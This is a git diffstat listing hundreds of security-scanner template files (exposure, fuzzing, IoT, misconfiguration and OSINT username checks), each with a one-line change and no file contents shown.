http/exposures/configs/dbeaver-credentials.yaml | 2 +- http/exposures/configs/debug-vars.yaml | 2 +- http/exposures/configs/detect-drone-config.yaml | 2 +- http/exposures/configs/django-variables-exposed.yaml | 2 +- http/exposures/configs/docker-compose-config.yaml | 2 +- http/exposures/configs/dockerfile-hidden-disclosure.yaml | 2 +- http/exposures/configs/editor-exposure.yaml | 2 +- http/exposures/configs/esmtprc-config.yaml | 2 +- http/exposures/configs/exposed-authentication-asmx.yaml | 2 +- http/exposures/configs/exposed-bitkeeper.yaml | 2 +- http/exposures/configs/exposed-bzr.yaml | 2 +- http/exposures/configs/exposed-darcs.yaml | 2 +- http/exposures/configs/exposed-gitignore.yaml | 2 +- http/exposures/configs/exposed-hg.yaml | 2 +- http/exposures/configs/exposed-sharepoint-list.yaml | 2 +- http/exposures/configs/exposed-svn.yaml | 2 +- http/exposures/configs/exposed-vscode.yaml | 2 +- http/exposures/configs/firebase-config-exposure.yaml | 2 +- http/exposures/configs/ftp-credentials-exposure.yaml | 2 +- http/exposures/configs/gcloud-config-default.yaml | 2 +- http/exposures/configs/git-config-nginxoffbyslash.yaml | 2 +- http/exposures/configs/git-config.yaml | 2 +- http/exposures/configs/git-credentials-disclosure.yaml | 2 +- http/exposures/configs/gmail-api-client-secrets.yaml | 2 +- http/exposures/configs/golangci-config.yaml | 2 +- http/exposures/configs/gruntfile-exposure.yaml | 2 +- http/exposures/configs/guard-config.yaml | 2 +- http/exposures/configs/hikvision-info-leak.yaml | 2 +- http/exposures/configs/honeywell-scada-config.yaml | 2 +- http/exposures/configs/hp-ilo-serial-key-disclosure.yaml | 2 +- http/exposures/configs/htpasswd-detection.yaml | 2 +- http/exposures/configs/httpd-config.yaml | 2 +- http/exposures/configs/javascript-env.yaml | 2 +- http/exposures/configs/jetbrains-datasources.yaml | 2 +- http/exposures/configs/joomla-config-file.yaml | 2 +- http/exposures/configs/karma-config-js.yaml | 2 +- http/exposures/configs/keycloak-openid-config.yaml | 2 +- .../configs/kubernetes-kustomization-disclosure.yaml | 2 +- http/exposures/configs/laravel-env.yaml | 2 +- http/exposures/configs/lvmeng-uts-disclosure.yaml | 2 +- http/exposures/configs/magento-config-disclosure.yaml | 2 +- http/exposures/configs/msmtp-config.yaml | 2 +- http/exposures/configs/nagios-status-page.yaml | 2 +- http/exposures/configs/netbeans-config.yaml | 2 +- http/exposures/configs/netrc.yaml | 2 +- http/exposures/configs/nginx-config.yaml | 2 +- http/exposures/configs/opcache-status-exposure.yaml | 2 +- http/exposures/configs/oracle-cgi-printenv.yaml | 2 +- http/exposures/configs/oracle-ebs-credentials.yaml | 2 +- http/exposures/configs/ovpn-config-exposed.yaml | 2 +- http/exposures/configs/owncloud-config.yaml | 2 +- http/exposures/configs/package-json.yaml | 2 +- http/exposures/configs/parameters-config.yaml | 2 +- http/exposures/configs/perl-status.yaml | 2 +- http/exposures/configs/phalcon-framework-source.yaml | 2 +- http/exposures/configs/php-fpm-config.yaml | 2 +- http/exposures/configs/phpinfo-files.yaml | 2 +- http/exposures/configs/phpsec-config.yaml | 2 +- http/exposures/configs/phpstan-config.yaml | 2 +- http/exposures/configs/pipfile-config.yaml | 2 +- http/exposures/configs/plesk-stat.yaml | 2 +- http/exposures/configs/pre-commit-config.yaml | 2 +- http/exposures/configs/procfile-config.yaml | 2 +- http/exposures/configs/proftpd-config.yaml | 2 +- http/exposures/configs/prometheus-metrics.yaml | 2 +- http/exposures/configs/proxy-wpad-exposure.yaml | 2 +- http/exposures/configs/pubspec-config.yaml | 2 +- http/exposures/configs/pyproject-toml.yaml | 2 +- http/exposures/configs/qdpm-info-leak.yaml | 2 +- http/exposures/configs/rackup-config-ru.yaml | 2 +- http/exposures/configs/rails-database-config.yaml | 2 +- http/exposures/configs/redis-config.yaml | 2 +- http/exposures/configs/robomongo-credential.yaml | 2 +- http/exposures/configs/rollup-js-config.yaml | 2 +- http/exposures/configs/rubocop-config.yaml | 2 +- http/exposures/configs/ruijie-information-disclosure.yaml | 2 +- http/exposures/configs/ruijie-nbr1300g-exposure.yaml | 2 +- http/exposures/configs/ruijie-phpinfo.yaml | 2 +- http/exposures/configs/s3cfg-config.yaml | 2 +- http/exposures/configs/s3cmd-config.yaml | 2 +- http/exposures/configs/saia-web-server-info.yaml | 2 +- http/exposures/configs/samba-config.yaml | 2 +- http/exposures/configs/scrutinizer-config.yaml | 2 +- http/exposures/configs/server-private-keys.yaml | 2 +- http/exposures/configs/sftp-config-exposure.yaml | 2 +- http/exposures/configs/sftp-credentials-exposure.yaml | 2 +- http/exposures/configs/sftp-deployment-config.yaml | 2 +- http/exposures/configs/ssh-authorized-keys.yaml | 2 +- http/exposures/configs/ssh-known-hosts.yaml | 2 +- http/exposures/configs/stestr-config.yaml | 2 +- http/exposures/configs/svnserve-config.yaml | 2 +- http/exposures/configs/symfony-database-config.yaml | 2 +- http/exposures/configs/symfony-profiler.yaml | 2 +- http/exposures/configs/symfony-security-config.yaml | 2 +- http/exposures/configs/tox-ini.yaml | 2 +- http/exposures/configs/ventrilo-config.yaml | 2 +- http/exposures/configs/web-config.yaml | 2 +- http/exposures/configs/webpack-config.yaml | 2 +- http/exposures/configs/websheets-config.yaml | 2 +- http/exposures/configs/wgetrc-config.yaml | 2 +- http/exposures/configs/xprober-service.yaml | 2 +- http/exposures/files/db-xml-file.yaml | 2 +- http/exposures/files/dbeaver-database-connections.yaml | 2 +- http/exposures/files/dwsync-exposure.yaml | 2 +- http/exposures/files/ioncube-loader-wizard.yaml | 2 +- http/exposures/files/jetbrains-webservers.yaml | 2 +- http/exposures/files/joomla-file-listing.yaml | 2 +- http/exposures/files/phpunit.yaml | 2 +- http/exposures/files/redmine-config.yaml | 2 +- http/exposures/files/salesforce-credentials.yaml | 2 +- http/exposures/files/sensitive-storage-exposure.yaml | 2 +- http/exposures/logs/fastcgi-echo.yaml | 2 +- http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml | 2 +- http/exposures/logs/struts-problem-report.yaml | 2 +- .../tokens/digitalocean/axiom-digitalocean-key-exposure.yaml | 2 +- .../tokens/digitalocean/tugboat-config-exposure.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/iot/apc-ups-login.yaml | 2 +- http/iot/automation-direct.yaml | 2 +- http/iot/codian-mcu-login.yaml | 2 +- http/iot/contacam.yaml | 2 +- http/iot/envision-gateway.yaml | 2 +- http/iot/epmp-login.yaml | 2 +- http/iot/heatmiser-wifi-thermostat.yaml | 2 +- http/iot/hp-laserjet-detect.yaml | 2 +- http/iot/internet-service.yaml | 2 +- http/iot/iotawatt-app-exposure.yaml | 2 +- http/iot/liveview-axis-camera.yaml | 2 +- http/iot/mobotix-guest-camera.yaml | 2 +- http/iot/netsurveillance-web.yaml | 2 +- http/iot/novus-ip-camera.yaml | 2 +- http/iot/nuuno-network-login.yaml | 2 +- http/iot/octoprint-3dprinter-detect.yaml | 2 +- http/iot/panasonic-network-management.yaml | 2 +- http/iot/qvisdvr-deserialization-rce.yaml | 2 +- http/iot/routeros-login.yaml | 2 +- http/iot/targa-camera-lfi.yaml | 2 +- http/iot/webcamxp-5.yaml | 2 +- http/miscellaneous/joomla-manifest-file.yaml | 2 +- http/misconfiguration/ace-admin-dashboard.yaml | 2 +- http/misconfiguration/aem/aem-childrenlist-xss.yaml | 2 +- http/misconfiguration/aem/aem-crx-bypass.yaml | 2 +- http/misconfiguration/aem/aem-groovyconsole.yaml | 2 +- http/misconfiguration/aem/aem-setpreferences-xss.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/aem/aem-xss-childlist-selector.yaml | 2 +- http/misconfiguration/akamai/akamai-arl-xss.yaml | 2 +- http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml | 2 +- http/misconfiguration/ampps-dirlisting.yaml | 2 +- http/misconfiguration/apache/tomcat-pathnormalization.yaml | 2 +- http/misconfiguration/aws-s3-explorer.yaml | 2 +- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 +- http/misconfiguration/cadvisor-exposure.yaml | 2 +- http/misconfiguration/command-api-explorer.yaml | 2 +- http/misconfiguration/cx-cloud-upload-detect.yaml | 2 +- http/misconfiguration/d-link-arbitary-fileread.yaml | 2 +- http/misconfiguration/deos-openview-admin.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/encompass-cm1-homepage.yaml | 2 +- http/misconfiguration/exposed-jquery-file-upload.yaml | 2 +- http/misconfiguration/exposed-sqlite-manager.yaml | 2 +- http/misconfiguration/ganglia-cluster-dashboard.yaml | 2 +- http/misconfiguration/hadoop-unauth-rce.yaml | 2 +- http/misconfiguration/haproxy-status.yaml | 2 +- http/misconfiguration/installer/avideo-install.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/getsimple-installation.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/nopcommerce-installer.yaml | 2 +- .../misconfiguration/installer/openshift-installer-panel.yaml | 2 +- http/misconfiguration/installer/wp-install.yaml | 2 +- http/misconfiguration/installer/zenphoto-setup.yaml | 2 +- http/misconfiguration/iot-vdme-simulator.yaml | 2 +- http/misconfiguration/jboss-status.yaml | 2 +- .../misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml | 2 +- http/misconfiguration/jupyter-ipython-unauth.yaml | 2 +- http/misconfiguration/kubernetes/kubernetes-pods.yaml | 2 +- http/misconfiguration/misconfigured-docker.yaml | 2 +- http/misconfiguration/mobiproxy-dashboard.yaml | 2 +- http/misconfiguration/mongodb-exporter-metrics.yaml | 2 +- http/misconfiguration/mysqld-exporter-metrics.yaml | 2 +- http/misconfiguration/nomad-jobs.yaml | 2 +- http/misconfiguration/ntopng-traffic-dashboard.yaml | 2 +- http/misconfiguration/office365-open-redirect.yaml | 2 +- http/misconfiguration/oneinstack-control-center.yaml | 2 +- .../misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml | 2 +- http/misconfiguration/openbmcs/openbmcs-ssrf.yaml | 2 +- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- .../phpmyadmin/phpmyadmin-misconfiguration.yaml | 2 +- .../misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml | 2 +- http/misconfiguration/prometheus/prometheus-config.yaml | 2 +- http/misconfiguration/proxy/metadata-alibaba.yaml | 2 +- http/misconfiguration/proxy/metadata-aws.yaml | 2 +- http/misconfiguration/proxy/metadata-azure.yaml | 2 +- http/misconfiguration/proxy/metadata-digitalocean.yaml | 2 +- http/misconfiguration/proxy/metadata-google.yaml | 2 +- http/misconfiguration/proxy/metadata-hetzner.yaml | 2 +- http/misconfiguration/proxy/metadata-openstack.yaml | 2 +- http/misconfiguration/proxy/metadata-oracle.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/misconfiguration/puppetdb-dashboard.yaml | 2 +- http/misconfiguration/put-method-enabled.yaml | 2 +- http/misconfiguration/questdb-console.yaml | 2 +- http/misconfiguration/rack-mini-profiler.yaml | 2 +- http/misconfiguration/rekognition-image-validation.yaml | 2 +- http/misconfiguration/rethinkdb-admin-console.yaml | 2 +- http/misconfiguration/s3-torrent.yaml | 2 +- http/misconfiguration/salesforce-aura.yaml | 2 +- http/misconfiguration/selenium-exposure.yaml | 2 +- http/misconfiguration/server-status.yaml | 2 +- http/misconfiguration/service-pwd.yaml | 2 +- http/misconfiguration/skycaiji-install.yaml | 2 +- http/misconfiguration/slurm-hpc-dashboard.yaml | 2 +- http/misconfiguration/solr-query-dashboard.yaml | 2 +- http/misconfiguration/spidercontrol-scada-server-info.yaml | 2 +- http/misconfiguration/springboot/springboot-auditevents.yaml | 2 +- http/misconfiguration/springboot/springboot-health.yaml | 2 +- http/misconfiguration/springboot/springboot-info.yaml | 2 +- http/misconfiguration/springboot/springboot-loggerconfig.yaml | 2 +- .../springboot/springboot-scheduledtasks.yaml | 2 +- http/misconfiguration/springboot/springboot-status.yaml | 2 +- http/misconfiguration/symfony-debug.yaml | 2 +- http/misconfiguration/tcpconfig.yaml | 2 +- .../teamcity/teamcity-registration-enabled.yaml | 2 +- http/misconfiguration/transmission-dashboard.yaml | 2 +- http/misconfiguration/unauth-fastvue-dashboard.yaml | 2 +- http/misconfiguration/unauth-selenium-grid-console.yaml | 2 +- http/misconfiguration/unauth-wavink-panel.yaml | 2 +- http/misconfiguration/unauthenticated-alert-manager.yaml | 2 +- http/misconfiguration/unauthenticated-mongo-express.yaml | 2 +- http/misconfiguration/unauthenticated-nacos-access.yaml | 2 +- http/misconfiguration/unauthenticated-popup-upload.yaml | 2 +- http/misconfiguration/unauthenticated-prtg.yaml | 2 +- http/misconfiguration/unauthenticated-tensorboard.yaml | 2 +- http/misconfiguration/unauthenticated-zipkin.yaml | 2 +- http/misconfiguration/unauthorized-h3csecparh-login.yaml | 2 +- http/misconfiguration/unauthorized-plastic-scm.yaml | 2 +- http/misconfiguration/ups-status.yaml | 2 +- http/misconfiguration/wamp-xdebug-detect.yaml | 2 +- http/misconfiguration/webdav-enabled.yaml | 2 +- http/misconfiguration/wildcard-postmessage.yaml | 2 +- http/misconfiguration/wp-registration-enabled.yaml | 2 +- http/misconfiguration/xss-deprecated-header.yaml | 2 +- http/misconfiguration/zabbix-dashboards-access.yaml | 2 +- http/misconfiguration/zabbix-error.yaml | 2 +- http/osint/1001mem.yaml | 2 +- http/osint/21buttons.yaml | 2 +- http/osint/247sports.yaml | 2 +- http/osint/3dnews.yaml | 2 +- http/osint/3dtoday.yaml | 2 +- http/osint/7cup.yaml | 2 +- http/osint/7dach.yaml | 2 +- http/osint/aaha-chat.yaml | 2 +- http/osint/aboutme.yaml | 2 +- http/osint/acf.yaml | 2 +- http/osint/admire-me.yaml | 2 +- http/osint/adult-forum.yaml | 2 +- http/osint/adultism.yaml | 2 +- http/osint/advfn.yaml | 2 +- http/osint/aflam.yaml | 2 +- http/osint/airline-pilot-life.yaml | 2 +- http/osint/airliners.yaml | 2 +- http/osint/akniga.yaml | 2 +- http/osint/albicla.yaml | 2 +- http/osint/alik.yaml | 2 +- http/osint/allesovercrypto.yaml | 2 +- http/osint/allmylinks.yaml | 2 +- http/osint/alloannonces.yaml | 2 +- http/osint/alltrails.yaml | 2 +- http/osint/ameblo.yaml | 2 +- http/osint/americanthinker.yaml | 2 +- http/osint/animeplanet.yaml | 2 +- http/osint/anobii.yaml | 2 +- http/osint/anonup.yaml | 2 +- http/osint/apex-legends.yaml | 2 +- http/osint/appian.yaml | 2 +- http/osint/apteka.yaml | 2 +- http/osint/archive-of-our-own-account.yaml | 2 +- http/osint/arduino.yaml | 2 +- http/osint/armorgames.yaml | 2 +- http/osint/artbreeder.yaml | 2 +- http/osint/artists-clients.yaml | 2 +- http/osint/artstation.yaml | 2 +- http/osint/asciinema.yaml | 2 +- http/osint/askfm.yaml | 2 +- http/osint/audiojungle.yaml | 2 +- http/osint/auru.yaml | 2 +- http/osint/authorstream.yaml | 2 +- http/osint/avid-community.yaml | 2 +- http/osint/babepedia.yaml | 2 +- http/osint/babypips.yaml | 2 +- http/osint/bandcamp.yaml | 2 +- http/osint/bandlab.yaml | 2 +- http/osint/bblog-ru.yaml | 2 +- http/osint/bdsmlr.yaml | 2 +- http/osint/bdsmsingles.yaml | 2 +- http/osint/behance.yaml | 2 +- http/osint/bentbox.yaml | 2 +- http/osint/biggerpockets.yaml | 2 +- http/osint/bigo-live.yaml | 2 +- http/osint/bikemap.yaml | 2 +- http/osint/bimpos.yaml | 2 +- http/osint/biolink.yaml | 2 +- http/osint/bitbucket.yaml | 2 +- http/osint/bitchute.yaml | 2 +- http/osint/bitcoin-forum.yaml | 2 +- http/osint/bittube.yaml | 2 +- http/osint/blipfm.yaml | 2 +- http/osint/blogger.yaml | 2 +- http/osint/blogipl.yaml | 2 +- http/osint/blogmarks.yaml | 2 +- http/osint/blogspot.yaml | 2 +- http/osint/bodybuildingcom.yaml | 2 +- http/osint/bonga-cams.yaml | 2 +- http/osint/bookcrossing.yaml | 2 +- http/osint/boosty.yaml | 2 +- http/osint/booth.yaml | 2 +- http/osint/breach-forums.yaml | 2 +- http/osint/brickset.yaml | 2 +- http/osint/bugcrowd.yaml | 2 +- http/osint/bunpro.yaml | 2 +- http/osint/buymeacoffee.yaml | 2 +- http/osint/buzzfeed.yaml | 2 +- http/osint/buzznet.yaml | 2 +- http/osint/cafecito.yaml | 2 +- http/osint/cal.yaml | 2 +- http/osint/calendy.yaml | 2 +- http/osint/cameo.yaml | 2 +- http/osint/carbonmade.yaml | 2 +- http/osint/careerhabr.yaml | 2 +- http/osint/caringbridge.yaml | 2 +- http/osint/carrdco.yaml | 2 +- http/osint/cashapp.yaml | 2 +- http/osint/castingcallclub.yaml | 2 +- http/osint/cd-action.yaml | 2 +- http/osint/cdapl.yaml | 2 +- http/osint/championat.yaml | 2 +- http/osint/chamsko.yaml | 2 +- http/osint/chaturbate.yaml | 2 +- http/osint/cheezburger.yaml | 2 +- http/osint/chesscom.yaml | 2 +- http/osint/chomikujpl.yaml | 2 +- http/osint/chyoa.yaml | 2 +- http/osint/climatejusticerocks-mastodon-instance.yaml | 2 +- http/osint/cloudflare.yaml | 2 +- http/osint/clubhouse.yaml | 2 +- http/osint/clusterdafrica.yaml | 2 +- http/osint/cnet.yaml | 2 +- http/osint/codeberg.yaml | 2 +- http/osint/codecademy.yaml | 2 +- http/osint/codeforces.yaml | 2 +- http/osint/codementor.yaml | 2 +- http/osint/coderwall.yaml | 2 +- http/osint/codewars.yaml | 2 +- http/osint/cohost.yaml | 2 +- http/osint/colourlovers.yaml | 2 +- http/osint/contactossex.yaml | 2 +- http/osint/coroflot.yaml | 2 +- http/osint/couchsurfing.yaml | 2 +- http/osint/cowboys4angels.yaml | 2 +- http/osint/cracked-io.yaml | 2 +- http/osint/cracked.yaml | 2 +- http/osint/crevado.yaml | 2 +- http/osint/crowdin.yaml | 2 +- http/osint/ctflearn.yaml | 2 +- http/osint/cults3d.yaml | 2 +- http/osint/curiouscat.yaml | 2 +- http/osint/cytoid.yaml | 2 +- http/osint/dailymotion.yaml | 2 +- http/osint/darudar.yaml | 2 +- http/osint/dateinasia.yaml | 2 +- http/osint/datezone.yaml | 2 +- http/osint/datingru.yaml | 2 +- http/osint/demotywatory.yaml | 2 +- http/osint/depop.yaml | 2 +- http/osint/designspriation.yaml | 2 +- http/osint/destructoid.yaml | 2 +- http/osint/deviantart.yaml | 2 +- http/osint/devrant.yaml | 2 +- http/osint/devto.yaml | 2 +- http/osint/dfgames.yaml | 2 +- http/osint/diablo.yaml | 2 +- http/osint/dibiz.yaml | 2 +- http/osint/digitalspy.yaml | 2 +- http/osint/diigo.yaml | 2 +- http/osint/disabledrocks-mastodon-instance.yaml | 2 +- http/osint/discogs.yaml | 2 +- http/osint/discourse.yaml | 2 +- http/osint/discusselasticco.yaml | 2 +- http/osint/discusssocial-mastodon-instance.yaml | 2 +- http/osint/disqus.yaml | 2 +- http/osint/dissenter.yaml | 2 +- http/osint/dockerhub.yaml | 2 +- http/osint/dojoverse.yaml | 2 +- http/osint/donation-alerts.yaml | 2 +- http/osint/dotcards.yaml | 2 +- http/osint/dribbble.yaml | 2 +- http/osint/droners.yaml | 2 +- http/osint/drum.yaml | 2 +- http/osint/duolingo.yaml | 2 +- http/osint/easyen.yaml | 2 +- http/osint/ebay-stores.yaml | 2 +- http/osint/ebay.yaml | 2 +- http/osint/elloco.yaml | 2 +- http/osint/engadget.yaml | 2 +- http/osint/eporner.yaml | 2 +- http/osint/etoro.yaml | 2 +- http/osint/etsy.yaml | 2 +- http/osint/expressionalsocial-mastodon-instance.yaml | 2 +- http/osint/extralunchmoney.yaml | 2 +- http/osint/eyeem.yaml | 2 +- http/osint/f3.yaml | 2 +- http/osint/fabswingers.yaml | 2 +- http/osint/faktopedia.yaml | 2 +- http/osint/fancentro.yaml | 2 +- http/osint/fandalism.yaml | 2 +- http/osint/fandom.yaml | 2 +- http/osint/fanpop.yaml | 2 +- http/osint/fansly.yaml | 2 +- http/osint/fark.yaml | 2 +- http/osint/farkascity.yaml | 2 +- http/osint/fatsecret.yaml | 2 +- http/osint/fcv.yaml | 2 +- http/osint/federatedpress-mastodon-instance.yaml | 2 +- http/osint/figma.yaml | 2 +- http/osint/filmweb.yaml | 2 +- http/osint/fine-art-america.yaml | 2 +- http/osint/fiverr.yaml | 2 +- http/osint/flickr.yaml | 2 +- http/osint/flipboard.yaml | 2 +- http/osint/flowcode.yaml | 2 +- http/osint/fodors-forum.yaml | 2 +- http/osint/fortnite-tracker.yaml | 2 +- http/osint/forumprawneorg.yaml | 2 +- http/osint/fosstodonorg-mastodon-instance.yaml | 2 +- http/osint/fotka.yaml | 2 +- http/osint/foursquare.yaml | 2 +- http/osint/freelancer.yaml | 2 +- http/osint/freesound.yaml | 2 +- http/osint/friendfinder-x.yaml | 2 +- http/osint/friendfinder.yaml | 2 +- http/osint/friendweb.yaml | 2 +- http/osint/furaffinity.yaml | 2 +- http/osint/furiffic.yaml | 2 +- http/osint/gab.yaml | 2 +- http/osint/game-debate.yaml | 2 +- http/osint/gamespot.yaml | 2 +- http/osint/garmin-connect.yaml | 2 +- http/osint/geocaching.yaml | 2 +- http/osint/getmonero.yaml | 2 +- http/osint/gettr.yaml | 2 +- http/osint/gfycat.yaml | 2 +- http/osint/gigapan.yaml | 2 +- http/osint/giphy.yaml | 2 +- http/osint/girlfriendsmeet.yaml | 2 +- http/osint/gitea.yaml | 2 +- http/osint/gitee.yaml | 2 +- http/osint/giters.yaml | 2 +- http/osint/github.yaml | 2 +- http/osint/gitlab.yaml | 2 +- http/osint/gloriatv.yaml | 2 +- http/osint/gnome-extensions.yaml | 2 +- http/osint/gpoddernet.yaml | 2 +- http/osint/grandprof.yaml | 2 +- http/osint/graphicssocial-mastodon-instance.yaml | 2 +- http/osint/gravatar.yaml | 2 +- http/osint/gumroad.yaml | 2 +- http/osint/hackaday.yaml | 2 +- http/osint/hacker-news.yaml | 2 +- http/osint/hackerearth.yaml | 2 +- http/osint/hackernoon.yaml | 2 +- http/osint/hackerone.yaml | 2 +- http/osint/hackerrank.yaml | 2 +- http/osint/hackster.yaml | 2 +- http/osint/hamaha.yaml | 2 +- http/osint/hanime.yaml | 2 +- http/osint/hcommonssocial-mastodon-instance.yaml | 2 +- http/osint/heylink.yaml | 2 +- http/osint/hiberworld.yaml | 2 +- http/osint/hihello.yaml | 2 +- http/osint/historianssocial-mastodon-instance.yaml | 2 +- http/osint/homedesign3d.yaml | 2 +- http/osint/hometechsocial-mastodon-instance.yaml | 2 +- http/osint/hoobe.yaml | 2 +- http/osint/hostuxsocial-mastodon-instance.yaml | 2 +- http/osint/houzz.yaml | 2 +- http/osint/hubpages.yaml | 2 +- http/osint/hubski.yaml | 2 +- http/osint/hugging-face.yaml | 2 +- http/osint/iconfinder.yaml | 2 +- http/osint/icq-chat.yaml | 2 +- http/osint/ifttt.yaml | 2 +- http/osint/ifunny.yaml | 2 +- http/osint/igromania.yaml | 2 +- http/osint/ilovegrowingmarijuana.yaml | 2 +- http/osint/imagefap.yaml | 2 +- http/osint/imageshack.yaml | 2 +- http/osint/imgsrcru.yaml | 2 +- http/osint/imgur.yaml | 2 +- http/osint/inaturalist.yaml | 2 +- http/osint/independent-academia.yaml | 2 +- http/osint/inkbunny.yaml | 2 +- http/osint/insanejournal.yaml | 2 +- http/osint/instagram.yaml | 2 +- http/osint/instructables.yaml | 2 +- http/osint/internet-archive-account.yaml | 2 +- http/osint/internet-archive-user-search.yaml | 2 +- http/osint/interpals.yaml | 2 +- http/osint/ismygirl.yaml | 2 +- http/osint/issuu.yaml | 2 +- http/osint/itchio.yaml | 2 +- http/osint/japandict.yaml | 2 +- http/osint/jbzd.yaml | 2 +- http/osint/jejapl.yaml | 2 +- http/osint/jeuxvideo.yaml | 2 +- http/osint/joe-monster.yaml | 2 +- http/osint/jsfiddle.yaml | 2 +- http/osint/justforfans.yaml | 2 +- http/osint/kaggle.yaml | 2 +- http/osint/karabin.yaml | 2 +- http/osint/keybase.yaml | 2 +- http/osint/kickstarter.yaml | 2 +- http/osint/kik.yaml | 2 +- http/osint/kipin.yaml | 2 +- http/osint/knowyourmeme.yaml | 2 +- http/osint/ko-fi.yaml | 2 +- http/osint/kongregate.yaml | 2 +- http/osint/kotburger.yaml | 2 +- http/osint/kwejkpl.yaml | 2 +- http/osint/librarything.yaml | 2 +- http/osint/libretoothgr-mastodon-instance.yaml | 2 +- http/osint/lichess.yaml | 2 +- http/osint/likeevideo.yaml | 2 +- http/osint/line.yaml | 2 +- http/osint/linktree.yaml | 2 +- http/osint/linuxorgru.yaml | 2 +- http/osint/litmindclub-mastodon-instance.yaml | 2 +- http/osint/livejournal.yaml | 2 +- http/osint/livemasterru.yaml | 2 +- http/osint/lobsters.yaml | 2 +- http/osint/lorsh-mastodon-instance.yaml | 2 +- http/osint/love-ru.yaml | 2 +- http/osint/lowcygierpl.yaml | 2 +- http/osint/maga-chat.yaml | 2 +- http/osint/magabook.yaml | 2 +- http/osint/magix.yaml | 2 +- http/osint/manyvids.yaml | 2 +- http/osint/mapmytracks.yaml | 2 +- http/osint/mapstodonspace-mastodon-instance.yaml | 2 +- http/osint/maroc-nl.yaml | 2 +- http/osint/marshmallow.yaml | 2 +- http/osint/martech.yaml | 2 +- http/osint/massage-anywhere.yaml | 2 +- http/osint/mastoai.yaml | 2 +- http/osint/mastodon-101010pl.yaml | 2 +- http/osint/mastodon-api.yaml | 2 +- http/osint/mastodon-chaossocial.yaml | 2 +- http/osint/mastodon-climatejusticerocks.yaml | 2 +- http/osint/mastodon-countersocial.yaml | 2 +- http/osint/mastodon-defcon.yaml | 2 +- http/osint/mastodon-eu-voice.yaml | 2 +- http/osint/mastodon-mastodon.yaml | 2 +- http/osint/mastodon-meowsocial.yaml | 2 +- http/osint/mastodon-mstdnio.yaml | 2 +- http/osint/mastodon-polsocial.yaml | 2 +- http/osint/mastodon-rigczclub.yaml | 2 +- http/osint/mastodon-social-tchncs.yaml | 2 +- http/osint/mastodon-tflnetpl.yaml | 2 +- http/osint/mastodon-tootcommunity.yaml | 2 +- http/osint/mastodonbooksnet-mastodon-instance.yaml | 2 +- http/osint/mastodonchasedemdev-mastodon-instance.yaml | 2 +- http/osint/mastodononline.yaml | 2 +- http/osint/mastonyc-mastodon-instance.yaml | 2 +- http/osint/mastown-mastodon-instance.yaml | 2 +- http/osint/mcname-minecraft.yaml | 2 +- http/osint/mcuuid-minecraft.yaml | 2 +- http/osint/mediakits.yaml | 2 +- http/osint/medium.yaml | 2 +- http/osint/medyczkapl.yaml | 2 +- http/osint/meet-me.yaml | 2 +- http/osint/megamodelspl.yaml | 2 +- http/osint/memrise.yaml | 2 +- http/osint/message-me.yaml | 2 +- http/osint/metacritic.yaml | 2 +- http/osint/microsoft-technet-community.yaml | 2 +- http/osint/minds.yaml | 2 +- http/osint/minecraft-list.yaml | 2 +- http/osint/mintme.yaml | 2 +- http/osint/mistrzowie.yaml | 2 +- http/osint/mix.yaml | 2 +- http/osint/mixi.yaml | 2 +- http/osint/mixlr.yaml | 2 +- http/osint/mmorpg.yaml | 2 +- http/osint/mod-db.yaml | 2 +- http/osint/moneysavingexpert.yaml | 2 +- http/osint/motokiller.yaml | 2 +- http/osint/moxfield.yaml | 2 +- http/osint/muck-rack.yaml | 2 +- http/osint/musiciansocial-mastodon-instance.yaml | 2 +- http/osint/musictraveler.yaml | 2 +- http/osint/my-instants.yaml | 2 +- http/osint/myanimelist.yaml | 2 +- http/osint/mybuildercom.yaml | 2 +- http/osint/myfitnesspal-author.yaml | 2 +- http/osint/myfitnesspal-community.yaml | 2 +- http/osint/mylot.yaml | 2 +- http/osint/mymfans.yaml | 2 +- http/osint/myportfolio.yaml | 2 +- http/osint/myspace.yaml | 2 +- http/osint/myspreadshop.yaml | 2 +- http/osint/naija-planet.yaml | 2 +- http/osint/nairaland.yaml | 2 +- http/osint/naturalnews.yaml | 2 +- http/osint/naver.yaml | 2 +- http/osint/netvibes.yaml | 2 +- http/osint/newgrounds.yaml | 2 +- http/osint/newmeet.yaml | 2 +- http/osint/nihbuatjajan.yaml | 2 +- http/osint/nitecrew-mastodon-instance.yaml | 2 +- http/osint/nnru.yaml | 2 +- http/osint/notabug.yaml | 2 +- http/osint/note.yaml | 2 +- http/osint/npmjs.yaml | 2 +- http/osint/oglaszamy24hpl.yaml | 2 +- http/osint/ogugg.yaml | 2 +- http/osint/okidoki.yaml | 2 +- http/osint/okru.yaml | 2 +- http/osint/olx.yaml | 2 +- http/osint/omlet.yaml | 2 +- http/osint/opencollective.yaml | 2 +- http/osint/opensource.yaml | 2 +- http/osint/openstreetmap.yaml | 2 +- http/osint/opgg.yaml | 2 +- http/osint/orbys.yaml | 2 +- http/osint/osu.yaml | 2 +- http/osint/our-freedom-book.yaml | 2 +- http/osint/owly.yaml | 2 +- http/osint/palnet.yaml | 2 +- http/osint/parler-archived-posts.yaml | 2 +- http/osint/parler-archived-profile.yaml | 2 +- http/osint/parler.yaml | 2 +- http/osint/pastebin.yaml | 2 +- http/osint/patch.yaml | 2 +- http/osint/patientslikeme.yaml | 2 +- http/osint/patreon.yaml | 2 +- http/osint/patriots-win.yaml | 2 +- 